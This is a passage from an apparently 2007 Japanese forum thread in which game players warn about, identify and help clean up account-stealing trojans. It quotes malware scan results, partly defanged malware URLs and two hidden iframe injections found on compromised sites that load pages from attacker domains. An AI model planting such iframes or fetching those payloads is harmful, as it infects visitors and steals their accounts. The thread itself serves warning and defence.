現在別PCでパス変更済みとのことなので、(既に盗み出された古いパスが送信されたとしても)
実害はないと判断しての回答。それ以外の個人情報についてまでは自己責任の範疇だし、垢ハック特化の
ものであるのに心配する必要は「現時点では」ないかと。

安全な環境(別パーティションや別HDDなど)から起動して検索かけることができるなら、その方法で。

694 名前:682 :07/04/18 00:30 ID:IPrLmwGp0
現在NOD32ダウンロードしてスキャンかけている最中です。
アーカイブ読み込み中にエラーやらファイルはパスワードで保護やらがわらわら出てきて
カスペの方のオンラインスキャン先にして確認した方がよかったかも・・・
とりあえず今晩の作業はここまでになりそうです。また明日お世話になるかと思いますが
よろしくお願いいたします 解決してはいませんが一区切りになりそうですので
ここまで協力してくださった方々に心からの感謝を。

695 名前:(^ー^*)ノ〜さん :07/04/18 00:51 ID:f4+8fYDf0
>>682,690
うちは682さんと同じくウイルスバスター使ってるんで、試しに検体を落としてみましたが、
ANIファイル2種(muxiao1.jpg, maxiao2.jpg)はバスターで検出できます。
肝心のsvch.exeはバスターでは検出できませんでした。
VirusTotalにもかけてみましたが、あまり検出率は良くないようです。

File name: svch.exe
File size: 18458 bytes
MD5: 5d9a4b4a4ccfefb275b7bf073bd84a76
SHA1: dd0328a7b5c287aaf729acf57edb29057605f8df

AntiVir     7.3.1.53  04.17.2007  TR/PSW.Maran.AU
Authentium     4.93.8  04.16.2007  could be a corrupted executable file
eSafe      7.0.15.0  04.16.2007  suspicious Trojan/Worm
Fortinet     2.85.0.0  04.17.2007  suspicious
Sunbelt     2.2.907.0  04.07.2007  VIPRE.Suspicious
Webwasher-Gateway  6.0.1  04.17.2007  Trojan.PSW.Maran.AU

検出可と出たのは上記6種のみで、あとはすべて不可でした。

696 名前:695 :07/04/18 01:01 ID:f4+8fYDf0
すみません。svch.exeですが、落としミスってました。ファイルサイズが明らかに違うしorz
落とせたら、調べなおしてみます。サーバー側の回線がしょぼいのかどうか知りませんが、
たった47kのファイルがなかなか落ちてきません。

697 名前:(^ー^*)ノ〜さん :07/04/18 01:07 ID:tBNe/wwN0
Authentiumは「ぶっ壊れてるよ」って言ってるじゃないか…。

698 名前:(^ー^*)ノ〜さん :07/04/18 01:16 ID:ytcE2Xhd0
ついでなんで、>>689-690を、カスペのオンラインスキャンでも検体を確認。

svch■exe:Trojan-PSW.Win32.Maran.cj
muxiao1■jpg:Exploit.Win32.IMG-ANI.k
muxiao2■jpg:Exploit.Win32.IMG-ANI.k

現時点で、全て検出可能なようです。

699 名前:695 :07/04/18 01:21 ID:f4+8fYDf0
今度こそ、正しく落とせたと思います。svch.exeですが、ウイルスバスターで検出できます。
検体を落とした瞬間に隔離されました。ウイルス名称はTSPY_MARAN.Dでした。
バスターOFFにして、VirusTotalにアップした結果は、

File name: svch.exe
File size: 48500 bytes
MD5: 6724111cc6f92a9ed32bc0381110a103
SHA1: bcdc42d920d235b030e488d6c93eb33bdc9b5bc8

AhnLab-V3 2007.4.18.0 04.17.2007 no virus found
AntiVir 7.3.1.53 04.17.2007 TR/PSW.Maran.AU
Authentium 4.93.8 04.16.2007 Possibly a new variant of W32/CrazyCrunch-based!Maximus
Avast 4.7.981.0 04.17.2007 Win32:Lineage-406
AVG 7.5.0.447 04.17.2007 PSW.Generic3.UJM
BitDefender 7.2 04.17.2007 Trojan.PWS.Maran.AY
CAT-QuickHeal 9.00 04.17.2007 (Suspicious) - DNAScan
ClamAV devel-20070312 04.17.2007 Trojan.Spy-3651
DrWeb 4.33 04.17.2007 Trojan.PWS.Maran
eSafe 7.0.15.0 04.17.2007 Win32.Maran.cj
eTrust-Vet 30.7.3574 04.17.2007 no virus found
Ewido 4.0 04.17.2007 Trojan.Maran.cj
FileAdvisor 1 04.17.2007 no virus found
Fortinet 2.85.0.0 04.17.2007 W32/Maran.CJ!tr.pws
F-Prot 4.3.2.48 04.17.2007 no virus found
F-Secure 6.70.13030.0 04.17.2007 Trojan-PSW.Win32.Maran.cj
Ikarus T3.1.1.5 04.17.2007 Trojan-Spy.Win32.Agent.hz
Kaspersky 4.0.2.24 04.17.2007 Trojan-PSW.Win32.Maran.cj
McAfee 5010 04.16.2007 Generic PWS.b
Microsoft 1.2405 04.17.2007 TrojanSpy:Win32/Maran.gen!A
NOD32v2 2198 04.17.2007 probably a variant of Win32/PSW.Maran
Norman 5.80.02 04.17.2007 W32/Viking.EQ
Panda 9.0.0.4 04.17.2007 Suspicious file
Prevx1 V2 04.17.2007 no virus found
Sophos 4.16.0 04.16.2007 Troj/Maran-Gen
Sunbelt 2.2.907.0 04.14.2007 VIPRE.Suspicious
Symantec 10 04.17.2007 Infostealer
TheHacker 6.1.6.095 04.15.2007 no virus found
VBA32 3.11.3 04.17.2007 Trojan.PWS.Maran
VirusBuster 4.3.7:9 04.17.2007 Packed/Upack
Webwasher-Gateway 6.0.1 04.17.2007 Trojan.PSW.Maran.AU

700 名前:(^ー^*)ノ〜さん :07/04/18 01:35 ID:ytcE2Xhd0
おつかれー。

そうすると、682さんも、(2005でもパターンは同じだろうし)検知できる環境だった可能性が高いですね。
「反応していなかった=入手前だった」ケースかどうかの確認の為に、踏んだ疑いのあるPCで、
>>690にあるファイルを直接ダウンロードすることを試みるのはどうだろうか。(反応する=入手を阻止)

あくまでもダウンロードだけで実行や表示はしないように。フォルダをつくってそこにダウンロード。
反応しないでダウンロード完了しても、フォルダごと削除。(ファイル指定だと誤爆発動の可能性がある)

パターンが古くて入手できちゃった(しかも、カスペオンラインスキャンでは入手したファイルが検知できる)なら
他のセキュリティソフトで除去するか、OS入れなおしコース。

701 名前:(^ー^*)ノ〜さん :07/04/18 02:26 ID:fhwGwzO/0
さるROサイトを持っている者です。

掲示板の書き込みにどう見ても罠ですなURLが頻繁にあったので
見た人が直に踏めないように
http:/を禁止ワードにして書き込めないようにしたのですが・・・。

それでもやってこられたんでなんというか必死だなと。

---以下書き込み文
「BSには精錬の好き嫌いがあるんじゃ...



3年ほどROをプレイしているが、今までちょくちょくBSで過剰精錬に挑戦して

たんだけど、どうも精錬する品によって精錬成功確立が違うような気がしてな

らない。俺の場合だとロンコの成功率が異常に高く、+7を連続4回成功させた

ことがある。しかし他のはいまいちで、シルクは10回くらい精錬して一度も+7

までにならなかった。まぁちょくちょく精錬する程度なので試行数が少ないか

らたまたまといったらそれまでなんだけど、BSになって武器研究10とった段階

でLvあげ止めてるので、BSのLvとかDexによって相性のいい精錬品があるんじゃ

ないかとか想像したりしてるんだが、他の人はどうなんだろと気になった。
詳しくはアルケミのテンプレを見ましょう。
www■jpxpie6-7net■com/web/read_cgi/
もし同じような傾向があれば教えて欲しいな。」
--------以上----

初の書き込みだというのにどう見ても罠です。
それにしても読みにくい。
なんか自サイトにあまりにも触れられていない内容の書き込みが
アダルト出会い系サイトとかを思い出させる。

702 名前:701 :07/04/18 02:38 ID:fhwGwzO/0
書き込んだ後読み直したらやはり罠ですね。

>>607 >>647

へんぴな趣味管理サイトで書き込み制限していて
コレだとWikiが本当に怖い。

703 名前:(^ー^*)ノ〜さん :07/04/18 02:41 ID:ytcE2Xhd0
>>701
まとめサイトに上がってるアドレスをhostsに使うだけじゃなく、禁止ワードにも流用しとけ。
新ドメインには対応できないけど、やらないよりましだろ。

704 名前:680 :07/04/18 02:45 ID:mqq4eyi00
>>680ですが、Eir板管理人様によりスレは削除され、その削除報告によると
今度は「ntfksm057153.fksm.nt.ftth.ppp.infoweb.ne.jp」から書き込まれたようです。
infowebって@niftyでしたっけ?

705 名前:(^ー^*)ノ〜さん :07/04/18 03:07 ID:I+divUlJ0
>>704
そう。
さらにfksmってことは福島か…

706 名前:(^ー^*)ノ〜さん :07/04/18 08:22 ID:SgO0kuoW0
毎度おなじみ福建人が新ドメインを取ったようだ。

罠は確認出来ないが前回のものを数日で使っていることを考えると
近いうちに使うと思われる。

Domain Name ..................... gamegohi■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-16 07:37:23

707 名前:701 :07/04/18 08:47 ID:knWXLRZd0
>>703
早速流用しました。ご指摘感謝です。
対策は少しでもやっておいて損はないですね。

708 名前:(^ー^*)ノ〜さん :07/04/18 10:19 ID:SgO0kuoW0
福建人、ソーシャルブックマークに進出。
www■flog■jp/m■php/4644

709 名前:(^ー^*)ノ〜さん :07/04/18 12:28 ID:fwjJOLM/0
げー…。短縮URLといい、いろいろやりよる。

710 名前:(^ー^*)ノ〜さん :07/04/18 13:33 ID:CjCbx9gM0
>>708
なんかよくワカランサービスだなと思いつつ管理側への
通報フォームを見つけたので通報。

類似内容が有ったら報告だけでなくどしどし通報すべし!

711 名前:(^ー^*)ノ〜さん :07/04/18 13:37 ID:zchstlnr0
もう一つ福建人ドメイン発見、またもFC2錯誤狙い。
FC2は福建人に愛されているようです。

これも13日登録、一体いくつ取ったんだろう。
どっちにしろ罠ドメイン登録の新記録は間違いないだろう。

罠スクリプトがある場所
www■cityblog-fc2web■com/game/

Domain Name ..................... cityblog-fc2web■com
Registrant Name ................. zhiqiang lin
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN
Expiration Date ................. 2008-04-13 07:06:52

712 名前:(^ー^*)ノ〜さん :07/04/18 15:50 ID:zchstlnr0
【ブログ改竄情報】福建人にクラックされ改竄されたブログ発見。
blog■livedoor■jp/baby_babr_baby_music/

日付や流れなどからパクリとかそういうレベルではないね。
これは間違いなく不正アクセスだ。

713 名前:682 :07/04/18 22:58 ID:IPrLmwGp0
本日の流れ NODスキャン>処理できたのとできなかったのが>バスターRT検索のまま
>NOD停止>カスペオンライン>重要なナントカ 結果0> マイコンピュータ ウイルス1感染ファイル3検索続行中
>バスターRT検索のままorz 明日の朝まで検索のまま放置してバスター終了させて検索かけ直しでいいですかね?
 あと、非常に初歩的ですが・・・ オンラインスキャンってことはLANケーブル抜いたら検索とまります?@@;
怖くて試せないorz

714 名前:(^ー^*)ノ〜さん :07/04/18 23:00 ID:pzuG6B1H0
色々しすぎてよーわからんね…、全部同時にかけてるの?

オンラインスキャンは線引っこ抜いたら止まる(はず

715 名前:(^ー^*)ノ〜さん :07/04/18 23:10 ID:RSGysyQa0
最初のプログラムやパターンのダウンロードが終われば
引っこ抜いても大丈夫な気もする

716 名前:682 :07/04/18 23:10 ID:IPrLmwGp0
全工程でウイルスバスターのリアルタイム検索有効で右下に常駐?させたまま
1 NODでスキャンかけて 2 検索時処理できたのとできなかったのが発生
3 正直混乱してきたのでNOD終了(プログラム残ってます)
4 カスペオンラインスキャンに乗り換え カテゴリー重要な〜 で検索結果0
5 カスペオンラインでカテゴリーマイコンピューター で現在検索中
見つかったウィルス3 感染したオブジェクト5に増えたorz

で、複数のアンチウィルスソフトの競合?というんでしょうか
を全く考えてない事に気付いた現在です
一応終わったらウィルスバスターをどうしてからカスペオンラインかけ直ししたらいいのか不安で・・・
リアルタイムを無効に? プログラムを終了? アンインストール? のどこまでやればいいのか・・・
言葉足らずですいませんでしたorz

717 名前:(^ー^*)ノ〜さん :07/04/18 23:47 ID:LH2nhlPB0
隔離されたファイルを再検出している気もするな

718 名前:(^ー^*)ノ〜さん :07/04/18 23:54 ID:LH2nhlPB0
オンラインスキャンならウイルスバスターは、そのままでも問題なく出来るはず
#実際にやってたし

上手く動作しないようならウイルスバスターを終了させてから、オンラインスキャンを
実行する


もしカスペルスキー試用版とかをインストールするなら、ウイルスバスターを
アンインストールしてからインストールすること

719 名前:にゅぼーん :にゅぼーん
にゅぼーん

720 名前:(^ー^*)ノ〜さん :07/04/19 00:29 ID:BOjyR3bM0
最近RMCでの垢ハックURL付き記事が酷く目立ちますね、ご注意をあげ

721 名前:(^ー^*)ノ〜さん :07/04/19 00:31 ID:3k8wjwin0
ラグナロクサーチは実際にあるから危険だな。

722 名前:(^ー^*)ノ〜さん :07/04/19 01:14 ID:Xcmm/SOb0
fujianが/(^o^)\フッジサーンに見えた

723 名前:(^ー^*)ノ〜さん :07/04/19 06:56 ID:Km33pbip0
>>320 のlovejpjp■comがちょっと面白い。
スクリプトは以下略でトロイは/22.exe。
ROとLineageの組み合わせはMaranなどでよく見るけど、
これはLineageとMapleStoryのハイブリッドアカハック。
さらに面白いのがbidder■ccにログインして何やらやっているところ
(台湾のヤフオクみたいなところっぽい)。
アカハックした上で自動で出品(売却)までやっちまう予感。

>>712
ブログのアカハックは珍しいね。
トラックバック飛ばしまくる予感。

724 名前:(^ー^*)ノ〜さん :07/04/19 07:01 ID:rIQ1l5YP0
>>723
すげーなそれ…。適当にばらまくだけで金が入るのか。
怒るのも呆れるのも笑うのも通り越して感心してしまったw

725 名前:(^ー^*)ノ〜さん :07/04/19 07:09 ID:mtCMIhOk0
注意勧告age
>>712にあるように、livedoorブログに不正アクセスをかけて垢ハックを仕込む手口があります。
個人ブログを閲覧するだけで垢ハックされる危険があります。

726 名前:(^ー^*)ノ〜さん :07/04/19 08:54 ID:Km33pbip0
一部のMaranが新しい圧縮形式に差し替えられているので注意
(NPack圧縮で74kB。従来のUpack圧縮は50kB程度、未圧縮なら150kB程度)。
例:www■ro-bot■net/ro-navi/yan.exe
NPack対応エンジンであることと、今までの検体の解析の際に
解凍して(未圧縮への)パターンを作っていれば検知するはず。

727 名前:(^ー^*)ノ〜さん :07/04/19 09:19 ID:gKnSnquA0
>>726
NOD32ではWin32/PSW.Maron トロイの亜種として検知されたな。

728 名前:(^ー^*)ノ〜さん :07/04/19 10:23 ID:Km33pbip0
美味しそうな名前だな。

729 名前:(^ー^*)ノ〜さん :07/04/19 10:30 ID:HHdWzbSD0
>>584他で出てくるホスト
OFSfb-21p4-127.ppp11.odn.ad.jp

リネージュ資料室のハエ取り紙(拒否履歴)にかかってる。

2007/04/18 15:03:41 OFSfb-21p4-127.ppp11.odn.ad.jp
2007/04/18 12:55:54 OFSfb-21p4-127.ppp11.odn.ad.jp

15時のほうはGoogle.cn使ってなにやら検索をかけてる模様。

730 名前:(^ー^*)ノ〜さん :07/04/19 10:48 ID:BOjyR3bM0
RMCの方もODNを利用しての書き込みのようですね、プロバイダ通報はどうなんだろう

731 名前:(^ー^*)ノ〜さん :07/04/19 10:54 ID:VUyqWbTE0
C:\WINDOWS\system32\Packet.dll
とURL Snooper(未起動)が
Backdoor.Win32.ForBot.t
に感染していたみたいなんですが、垢ハックでしょうか?
ウィルス情報のページが英語のページばかりでよくわかりません。

732 名前:(^ー^*)ノ〜さん :07/04/19 11:12 ID:F1g9qBEU0
マロン(栗)ならmaronじゃなくてmarronだな。

そういえばOFSfb-21p4-127でググるとRMTサイトの宣伝書き込みに当たったんだが
書き込まれたサイトのアドレスがjprmthomeに改変されてた。

通常プレイヤーにはある意味歓迎できる状況ではあるが、顧客やその候補からも
奪おうとするあたり、なんか凄いと思った。

>731
ある意味アカハックよりタチが悪い。
それはバックドアウィルスでIRC経由でPCをコントロールされる。

丁度上で話が出てるOFSfb-21p4-127もそれと同じで、中華の協力者でなければ
同様なウィルスに感染してハッカーに利用されてる可能性が高い。
つまり気がつかない間に垢ハクやら何やらの共犯者に仕立て上げられてる可能性がある。

HDD内部の情報は取られてるだろうし、Spamの発信とかにも利用される。
ROどころかメッセンジャーやら何やら、それらのPASSも抜かれてる可能性が高い。
急いで駆除した後、ROだけじゃなくメールから何から、ありとあらゆるPASSを変更すべし。

733 名前:731 :07/04/19 11:18 ID:VUyqWbTE0
今も調べていました。
2つとも削除しました。

ルーター・avast!・zonealarm の環境で
IRC使っていないから大丈夫かなと思っていたんですが
念のためパス変えておきます。

ありがとうございました。

734 名前:(^ー^*)ノ〜さん :07/04/19 11:29 ID:nNFGeHfG0
>>731
Backdoor (トロイの木馬)
垢ハックではないがバックドアもの、731氏のPCが乗っ取られ
垢ハックウイルス投稿の踏み台にされる可能性がある。
よって早急に駆除、および再インストールをお勧めする

Viruslist.com(日本語)の
Backdoor.Win32.ForBot.rの説明をリンクしておく
(731氏が感染したのは名前からしてこれの亜種と思われる)
ttp://www.viruslistjp.com/viruses/encyclopedia/?virusid=69952

735 名前:(^ー^*)ノ〜さん :07/04/19 11:38 ID:F1g9qBEU0
>IRC使っていないから大丈夫かなと思っていたんですが
思いっきり勘違いしてる。

PC所有者がIRCを使ってる使ってないは関係ない。
ウィルス自身がIRCクライアントの機能を持って、裏で勝手にハク犯が動かすIRC鯖に
繋ぎに行ってる。

IRCは一言で言えば1行の同報メールで、そこに発信したものは繋がってる人に一斉に送られる。
そのため、ウィルス蔵が特定の文字列に対して決まった動作をするように仕込んでおけば
ハク犯の命令に従って、一斉に動作してしまう。

Web鯖を落すDDoS攻撃なんかがその良い例で、○○に対してPingを撃て、と流すだけで
感染して繋がってるPC(ゾンビPC)全てが一斉にPingを撃つ。
ゾンビPCの数が多ければ多いほど攻撃数が増える。
(ちなみにbotnetとは、こういう状態のPC群の事を指す)

そしてWeb鯖の管理者が攻撃を行ったPC・IPを調べると、感染した人に突き当たる。
感染者が被害者じゃなく加害者(ハッカーの共犯者)になる、ってのはこういう意味。

これらは宣伝のSpamメールだけじゃなく、アカハックやフィッシング詐欺の書き込みに
利用される事だってある。

ゾンビPC化してるって事は、ハクウィルスに感染してる以上の脅威と思ったほうがいい。
ハクウィルスは極論すれば引退すればそれ以上被害を受けないが、バックドア系は
下手すれば加害者としてリアルの問題に発展する。

736 名前:(^ー^*)ノ〜さん :07/04/19 11:42 ID:Km33pbip0
>>733
意識して使わずともそのトロイ自体がIRCクライアントとして動作する。
WindowsLive(MSN)Messenger、Yahoo!Messenger、AOL(以下略)、ICQなど
多くのメッセンジャがある今でもIRCボットと称される物がゾロゾロいるのは
誰でも簡単に実装できるからなんだよ。いつか話題に出たボットネットもその多くはIRCボット。
ttp://ja.wikipedia.org/wiki/%E3%83%9C%E3%83%83%E3%83%88%E3%83%8D%E3%83%83%E3%83%88

ついでに言うとネトゲトロイの多く(Maran等)は盗んだアカウントを送信するメーラの他、
IEコンポーネント経由でPOSTするルーチンも自前で実装している。

737 名前:735 :07/04/19 12:05 ID:F1g9qBEU0
それとIRC鯖は鯖同士をリンクさせる機能もある。
これによりウィルス自身にIRC鯖の機能も持たせると、鯖の実体が存在しなくても
ネットワーク上にbotnetが存在する事になる。

Winny等のP2Pソフトみたいなもので、本体の鯖となる部分が存在しないので、IRC鯖から
ハク犯(攻撃者)に辿り着く事は不可能に近い。

ハクアドレスの貼り付けもゾンビPC経由で行われると、本来の攻撃者に辿り着くのは困難。
またハクったPASS等をそのbotnetに流すことで、攻撃者は足元がつかずに情報を得る事も可能。

正直な所、ハクウィルスの方がまだ可愛い。
バックドア系は使い方次第で何でも出来るので、影響力は何倍も大きい。

738 名前:(^ー^*)ノ〜さん :07/04/19 13:31 ID:n+TTzMMD0
ttp://chaosbot.exblog.jp/tb/5162567

知ってるブログアドだったから何気なく踏んでしまった;;

739 名前:(^ー^*)ノ〜さん :07/04/19 13:33 ID:BOjyR3bM0
知らんけどURLの一部伏せろよ…、それ自体が危険URLなら早く削除依頼してこい

740 名前:(^ー^*)ノ〜さん :07/04/19 13:43 ID:gKnSnquA0
chaosBOT情報局のトラックバックかな?
view-sourceで見てもエラーになってるだけ。738が何をどうしたのかよくわからん。

取り敢えず、LiveROのスレへどうぞ。

741 名前:(^ー^*)ノ〜さん :07/04/19 15:24 ID:Y7cHdY5X0
>733
>ルーター・avast!・zonealarm の環境で
>IRC使っていないから大丈夫かなと思っていたんですが

大丈夫だったらそもそも感染してないというか、>734のを見たら仕込まれてたのが
垢ハック(キーロガー)+αでなんでもありの代物だったと言う事が判ると思う。

>念のためパス変えておきます。
念のため、じゃない。
>732の言うようにRO含めて「すべての」PASS変更を行う「必要」がある。

Avastもそうだが、どんなアンチウィルスソフトも万能じゃないし、ZAも設定ミスると
不正な通信も許可したことになって、FWの意味が全く無い。

さらにAvastを突破してるという事は、他のウィルスがまだ潜んでる可能性だって十分ある。
なんか気楽に考えてるように見えるが、事態はかなり深刻で緊急を要する状況だと
自覚したほうがいい。

742 名前:(^ー^*)ノ〜さん :07/04/19 15:32 ID:VaGDBumE0
>>728,732
ちなみに正解はこっちな(酔
ttp://www.sakesake.com/item/kurabetu2/22/2-22-5.html

743 名前:(^ー^*)ノ〜さん :07/04/19 15:48 ID:BOjyR3bM0
この場でよくもまぁ怪しいURLポンポン張れるわなぁ…、しかもくだらない

744 名前:(^ー^*)ノ〜さん :07/04/19 16:18 ID:wL8JN6+p0
>609>719
万が一の事があるかもしれないから
「.」を「■」に変換しておいた方が良いと思う

745 名前:682 :07/04/19 21:41 ID:y/tKrur00
本日の流れ
ウィルスバスター2005アンインストール>カスペIS試用版インストール>
更新>重要な領域検索>検出なし>完全スキャン>
トロイTrojan.Win32.Zapchastと31個の(メモ忘れorzノーウイルス〜みたいな)計32個検出>
駆除が選択できなかった為削除>更新>完全スキャン(現在ココ)
スレッド検索しても同じトロイがひっかからなかったのが少々不安ですが
現状こんな感じです。 
聞いてばかりで申し訳ありませんが完全スキャン終了後に取るべき行動ご教授願いますorz
また、現状の不安な点 LAN線伝ってルータ経由で別PCに感染とかするものなのか不明・・・

746 名前:(^ー^*)ノ〜さん :07/04/19 22:25 ID:gKnSnquA0
>現状の不安な点 LAN線伝ってルータ経由で別PCに感染とかするものなのか不明・・・
BOTネットやバックドアが仕込まれている場合は危険があるが、全部除去済みと仮定すると
その心配は杞憂。トロイ等ではない、いわゆる増殖を行なうようなウィルスは、動かさない限り
他PCに攻撃をかけないし、他PC側が、それ相応の対応策を講じている場合はブロック可能。

取り敢えず、無駄な心配はしないで、徹底的に除去作業やっとけと。

>トロイTrojan.Win32.Zapchastと31個の(メモ忘れorzノーウイルス〜みたいな)計32個検出>
メモ忘れは、セキュリティソフトのログに残っている筈。

Trojan.Win32.Zapchast
>・侵入方法:
> 単体では特にメール送信やネットワーク越しの感染などはありません。人間などによるファイルの
>受け渡しによってのみ他のマシンに頒布されます。一般的にWeb上やスパムメールなどを介して配布されて
>いるものをユーザが誤って導入してしまうケースが多いようです。
http://www.f-secure.co.jp/v-descs/v-descs3/Trojan.Win32.Zapchast.al-jp.htm
http://www.sophos.co.jp/security/analyses/trojtaladraf.html
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_OTORUN.A

>完全スキャン終了後に取るべき行動
セキュリティ対策ソフトにより、除去できたと確信できたなら、自己責任でそのまま使う。
複数の「導入原因に心当たりの無い」ものが含まれていたようなので、必要なデータをバックアップした後
「HDDをフォーマットしてからOSのインストールと環境の再構築」がベストの解決策と思われる。

そのまま使うにしろ、OS入れなおしにしろ、次の環境では、WindowsUpdateと、セキュリティソフトの導入は
しっかりとやっとけな。

747 名前:(^ー^*)ノ〜さん :07/04/19 22:26 ID:BOjyR3bM0
ここでのメインはROの垢ハック関連情報だからそれ以外はあまり詳しくは書かれてないと思う
軽視してるわけじゃないけどね
だからこのスレになかったらどうとかは考えない方が良いよ
一応ウイルス名でググって出た物
--------------------------------------------------------
名称 Troj/Hostol-A
種類 * トロイの木馬
感染の恐れがある OS * Windows
副作用
* さらにマルウェアをドロップする
* システムセキュリティを低下させる
* 自身をレジストリにインストールする
* コンピュータの未感染ファイルはそのままにしておく
別名
* Trojan.Win32.Zapchast
--------------------------------------------------------
トロイだから完全に駆除できたことがわかったら重要なパスを変更して置いた方が良いと思う
具体的に何する物でレジストリ改変辺りまでしてるのかはわからないから詳しい人補足お願いします

748 名前:(^ー^*)ノ〜さん :07/04/19 22:27 ID:BOjyR3bM0
ごふ、詳細が、こちらのは忘れてくださいっ!

749 名前:(^ー^*)ノ〜さん :07/04/19 22:41 ID:gKnSnquA0
>>726
yan.exe : カスペより返答。Trojan-PSW.Win32.Maran.cj。次回アップデートに含める。

>>723
22.exe : カスペより返答。Trojan-PSW.Win32.Magania.jq。次回アップデートに含める。

ヒューリスティックスキャンに引っ掛かっるものかどうかは不明だが、どちらもパターン更新で
正式に対応される模様。NOD32もヒューリスティックスキャンに引っ掛かっただけなので
検体提出済み。近日中には、正式にパターンで対応されると思われる。

※ ヒューリスティックスキャンとは、未知のウィルスの検索手法であり、意図的に有効にしないといけない。
  パターンのみの検査に設定されていると、新種のすり抜けが発生する可能性がある。
  検査時間が長くなるので、全ての人が設定している訳ではない。
  ただ、この機能をONにしているからといって、未知のウィルスを全て検出できる訳ではないので過信は禁物。

NOD32のヘルプより引用
>[ヒューリスティック検査]
>ウイルスを仮想コンピュータ内で実際に動作させ、その挙動を観察することにより、ウイルスを検出する方法です。
>ウイルス定義ファイルに記録されていない、未知ウイルスの検出に有効な検査です。
>[アドバンスドヒューリスティック]
>ファイル内部を直接解析してウイルスのコードが含まれていないかを検査し、仮想コンピュータ内で実際に動作させて
>ウイルスの有無を確認します。ウイルス定義ファイルに記録されていない、未知ウイルスの検出に有効な検査です。

750 名前:(^ー^*)ノ〜さん :07/04/19 22:46 ID:ZnJiPrcm0
http://www.southbound-inc■com/index.asp

いつぞやのダメ旅行代理店再び。
どんな作りか知らないけれど、/と /index.asp とで表示される内容が
微妙に異なり、index.asp付きの場合

<script type="text/javascript" src="ac.js"></script>
</body><IFRAME src="http://www.zhangweijp■com/tro/index.htm" frameBorder=0 width=0 height=0></IFRAME><IFRAME src="http://www.zhangweijp■com/tt1/index.htm" frameBorder=0 width=0 height=0></IFRAME>
</html>

こんなのが埋まってる。


# まともな管理者おらんのかここは…

751 名前:682 :07/04/19 22:53 ID:y/tKrur00
情報・アドバイスありがとうございます。
最初にカスペUSBで移動試みた際に受け渡している為、念を入れて
こちらのPCもオンラインスキャンかけてみます。
とりあえず感染?側完全スキャン終了後にWindowsUpdate、S&D・AdAwareアップデートして
それぞれスキャン、再度カスペ更新>スキャンしてから別ページやRo等繋ぐか考えてみます。
最初踏んで貰っちまったか?と軽くナーバスでしたがここの皆さんの対応が暖かくてだいぶ救われてます(つ-T
まだまだお世話になるかも知れませんがよろしくお願いいたします。

752 名前:(^ー^*)ノ〜さん :07/04/19 23:16 ID:i/1U3o1a0
こんばんは。今日、ブログのコメントにあったアドレスを踏んでしまいました。
fc2ブログのアドレスだったので油断してました…。

ttp://pppgamesk■blog100■fc2■com/
リンク先はあるROブログを書いている人のコピーにウイルスが仕込まれていると思われます。
文字化けが多かったので、コレはやばいとおもってすぐ閉じました。

ソースチェッカーで調べてみたところ、
<iframe src="http://www■lovetw■webnow■biz/liang/lin■htm" name="zhu" width="0" height="0" frameborder="0"><div align=center><a href="" target=_blank></a></div></body>
</html>
とありました。カスペの方でウィルスチェックしてみたところ
96%現在で、
見つかったウイルス:1
感染したオブジェクト:2
と出ました。

垢ハックアドレスを踏んでしまったあとは、ROには一切接続しておらず、
別PCでパスワードなどを変更してきました。

とりあえず、このあと色々調べてウイルス除去をしようと思います。
初心者で余り知識が無いので、もし何かアドバイスがあればお願いします。

753 名前:(^ー^*)ノ〜さん :07/04/19 23:26 ID:gKnSnquA0
>初心者で余り知識が無いので
免罪符にならないので質問・相談の際に、最初からそのフレーズを使うのは避けた方がいいな。

カスペで検知できたのだから、カスペで除去すればおしまい。
除去するまで、Roやアトラクションセンターなどに繋がないことだけ注意。がんばれ。

754 名前:(^ー^*)ノ〜さん :07/04/19 23:33 ID:NzrLatfc0
>>752
とりあえずテンプレ4を埋めてみてくれないか。
分からないところは分からないでいいからさ。

755 名前:(^ー^*)ノ〜さん :07/04/20 00:56 ID:qZy9kMuS0
>>750
ひでぇ…。証拠保全のために残しているならwebからは隔離するだろうし、
削除権限奪われちゃって新しいトップをコピペで作っただけとかかぁ?
「株式会社てくのろ」が開発から運用・保守までやっているようだ。
ac.jsも同社のアクセス解析の模様。

756 名前:(^ー^*)ノ〜さん :07/04/20 01:00 ID:/fxDfoGf0
ROM776の雑談掲示板にあった書き込み。
※垢ハックURLなので注意。

>私は最近転職したばかりのLv71の火セージなんですが先日、時計塔で狩をしていた際の事
>目前にクロックが現れたので、縦FWを張ってFボルトを詠唱しようとした瞬間、私の傍に突然テレポートで飛んできたアサシンが私が狙って詠唱開始しようとしたクロックに攻撃を始めたんです。
>攻撃終了後にその事を注意をしたら、そのアサシンは
>「はぁ?FWで先にターゲット設定してるなんて話始めて聞くわ。」
と人を馬鹿にしたような発言をする始末です。
>この場合、どっちが間違っていたんですか!?
>普通、こういう場合って時計塔では大抵の方はFWをたてた段階で周辺のクロックへの攻撃は皆さん遠慮してくれているのですが……。
詳しくはアルケミのテンプレを見ましょう。
>ttp://www■jpxpie6-7net■c om/web/read_cgi/
>どうか誰か教えていただく事はできないでしょうか?

757 名前:(^ー^*)ノ〜さん :07/04/20 01:04 ID:XOpbFaZp0
>詳しくはアルケミのテンプレを見ましょう。
唐突すぎてワラタw

758 名前:752 :07/04/20 08:44 ID:9TkMHYmt0
【  アドレス   】 ttp://pppgamesk■blog100■fc2■com/
【気付いた日時】 4/19
【     OS    】 XP
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 覚えてません
【 アンチウイルスソフト 】 Norton SystemWorks 2004 バージョン7.00
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 Yes (まだ途中です)
【説明】
>>752 の通りです。結局、6個の検知しましたとでました。
怖くなってすぐ駆除しちゃったので、詳細は覚えてないのですが
トロイって書いてありました。駆除した後、今もう一度スキャンしなおしてます。

759 名前:(^ー^*)ノ〜さん :07/04/20 09:50 ID:51Qzls+i0
>>758
いくつか訊いておきたいけど、OSとブラウザのService Packがいくつか分かるかな?
